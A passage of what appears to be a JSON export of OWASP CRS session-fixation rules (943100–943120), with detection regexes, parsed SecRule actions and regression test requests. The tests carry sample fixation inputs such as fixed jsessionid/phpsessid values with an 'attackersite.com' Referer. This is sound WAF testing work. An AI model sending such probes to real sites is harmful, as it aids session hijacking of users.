"act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 18, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 18, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 18, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 18, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 18, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 18, "act_quote": "no_quote", "act_arg": "END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 18 } }, { "rule_id": "943100", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i:\\.cookie\\b.*?;\\W*?(?:expires|domain)\\W*?=|\\bhttp-equiv\\W+set-cookie\\b)", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Possible Session Fixation Attack: Setting Cookie Values in HTML", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-fixation" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-fixation", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SESSION-FIXATION", "capec/1000/225/21/593/61" ] }, "test_cases": [ { "description": "Session Fixation Attack (943100) from old modsec regressions", "test_id": 1, "request": { "method": "GET", "uri": "/get/foo.php?bar=blah", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-sg", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "Referer": "http", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 943100 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "bar=blah" } ] }, { "description": "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG", "test_id": 2, "request": { "method": "GET", "uri": "/get/foo.php?test=.cookie;expires=", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-sg", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "Referer": "http", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 943100 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=.cookie;expires=" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 31, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i:\\.cookie\\b.*?;\\W*?(?:expires|domain)\\W*?=|\\bhttp-equiv\\W+set-cookie\\b)", "actions": [ { "act_name": "id", "lineno": 32, "act_quote": "no_quote", "act_arg": "943100", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 33, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 34, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 35, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 36, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 36, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 37, "act_quote": "quotes", "act_arg": "Possible Session Fixation Attack: Setting Cookie Values in HTML", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 38, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 39, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 40, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 41, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 42, "act_quote": "quotes", "act_arg": "attack-fixation", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 43, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 44, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 45, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SESSION-FIXATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 46, "act_quote": "quotes", "act_arg": "capec/1000/225/21/593/61", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 47, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 48, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 49, "act_quote": "quotes", "act_arg": "tx.session_fixation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 50, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 31 } }, { "rule_id": "943110", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?:jsessionid|aspsessionid|asp\\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|sessionid|cfid|cftoken|cfsid|jservsession|jwsession|_flask_session|_session_id|connect\\.sid|laravel_session)$", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "2", "message": "Possible Session Fixation Attack: SessionID Parameter Name with Off-Domain Referer", "logdata": "Matched Data: %{TX.0} found within %{TX.943110_MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-fixation" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-fixation", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SESSION-FIXATION", "capec/1000/225/21/593/61" ] }, "test_cases": [ { "description": "Session Fixation Attack (943110) from old modsec regressions", "test_id": 1, "request": { "method": "GET", "uri": "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-sg", "Content-Type": "application/x-www-form-urlencoded", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "Referer": "http://www.attackersite.com/test", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 943110 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "jsessionid=74B0CB414BD77D17B5680A6386EF1666" } ] }, { "description": "session fixation attack", "test_id": 2, "request": { "method": "GET", "uri": "/get?phpsessid=asdfdasfadsads", "headers": { "Host": "localhost", "Referer": "https://localhost.attackersite.com/", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 943110 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "phpsessid=asdfdasfadsads" } ] }, { "description": "session fixation attack", "test_id": 3, "request": { "method": "GET", "uri": "/get?phpsessid=asdfdasfadsads", "headers": { "Host": "localhost", "Referer": "https://attackersite.com/", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 943110 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "phpsessid=asdfdasfadsads" } ] }, { "description": "Session Fixation Attack (943110) from old modsec regressions", "test_id": 4, "request": { "method": "GET", "uri": "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-sg", "Content-Type": "application/x-www-form-urlencoded", "Host": "localhost", "Referer": "http://localhost/test", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 943110 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "jsessionid=74B0CB414BD77D17B5680A6386EF1666" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 53, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?:jsessionid|aspsessionid|asp\\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|sessionid|cfid|cftoken|cfsid|jservsession|jwsession|_flask_session|_session_id|connect\\.sid|laravel_session)$", "actions": [ { "act_name": "id", "lineno": 54, "act_quote": "no_quote", "act_arg": "943110", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 55, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 56, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 57, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 58, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 58, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 59, "act_quote": "quotes", "act_arg": "Possible Session Fixation Attack: SessionID Parameter Name with Off-Domain Referer", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 60, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{TX.943110_MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 61, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 62, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 63, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 64, "act_quote": "quotes", "act_arg": "attack-fixation", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 65, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 66, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 67, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SESSION-FIXATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 68, "act_quote": "quotes", "act_arg": "capec/1000/225/21/593/61", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 69, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 70, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 71, "act_quote": "quotes", "act_arg": "tx.943110_matched_var_name=%{matched_var_name}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 72, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 53 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Referer", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?:ht|f)tps?://(.*?)/", "negated": false } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 73, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Referer", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?:ht|f)tps?://(.*?)/", "actions": [ { "act_name": "capture", "lineno": 74, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 75, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 73 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "1", "negated": false } ], "operator": { "type": "@endsWith", "argument": "%{request_headers.host}", "negated": true } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 76, "variables": [ { "variable": "TX", "variable_part": "1", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@endsWith", "operator_argument": "%{request_headers.host}", "actions": [ { "act_name": "setvar", "lineno": 77, "act_quote": "quotes", "act_arg": "tx.session_fixation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 78, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 76 } }, { "rule_id": "943120", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?:jsessionid|aspsessionid|asp\\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|sessionid|cfid|cftoken|cfsid|jservsession|jwsession|_flask_session|_session_id|connect\\.sid|laravel_session)$", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "2", "message": "Possible Session Fixation Attack: SessionID Parameter Name with No Referer", "logdata": "Matched Data: %{TX.0} found within %{TX.943120_MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-fixation" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-fixation", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SESSION-FIXATION", "capec/1000/225/21/593/61" ] }, "test_cases": [ { "description": "Session Fixation Attack (943120) from old modsec regressions", "test_id": 1, "request": { "method": "GET", "uri": "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-sg", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 943120 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "jsessionid=74B0CB414BD77D17B5680A6386EF1666" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 81, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?:jsessionid|aspsessionid|asp\\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|sessionid|cfid|cftoken|cfsid|jservsession|jwsession|_flask_session|_session_id|connect\\.sid|laravel_session)$", "actions": [ { "act_name": "id", "lineno": 82, "act_quote": "no_quote", "act_arg": "943120", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 83, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 84, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 85, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 86, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 86, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 87, "act_quote": "quotes", "act_arg": "Possible Session Fixation Attack: SessionID Parameter Name with No Referer", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 88, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{TX.943120_MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 89, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 90, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 91, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 92, "act_quote": "quotes", "act_arg": "attack-fixation", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 93, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 94, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 95, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SESSION-FIXATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 96, "act_quote": "quotes", "act_arg": "capec/1000/225/21/593/61", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 97, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 98, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 99, "act_quote": "quotes", "act_arg": "tx.943120_matched_var_name=%{matched_var_name}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 100, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 81 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Referer", "negated": false } ], "operator": { "type": "@eq", "argument": "0", "negated": false } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 101, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Referer", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "0", "actions": [ { "act_name": "setvar", "lineno": 102, "act_quote": "quotes", "act_arg": "tx.session_fixation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 103, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 101 } }, { "rule_id": "943013", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 108, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 108, "act_quote": "no_quote", "act_arg": "943013", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 108, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 108, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 108, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 108, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 108, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 108, "act_quote": "no_quote", "act_arg": "END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 108 } }, { "rule_id": "943014", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 109, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 109, "act_quote": "no_quote", "act_arg": "943014", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 109, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 109, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 109, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 109, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 109, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 109, "act_quote": "no_quote", "act_arg": "END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 109 } }, { "rule_id": "943015", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 116, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 116, "act_quote": "no_quote", "act_arg": "943015", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 116, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 116, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 116, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 116, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 116, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 116, "act_quote": "no_quote", "act_arg": "END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 116 } }, { "rule_id": "943016", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 117, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 117, "act_quote": "no_quote", "act_arg": "943016", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 117, "act_quote": "no_quote", "act_arg": 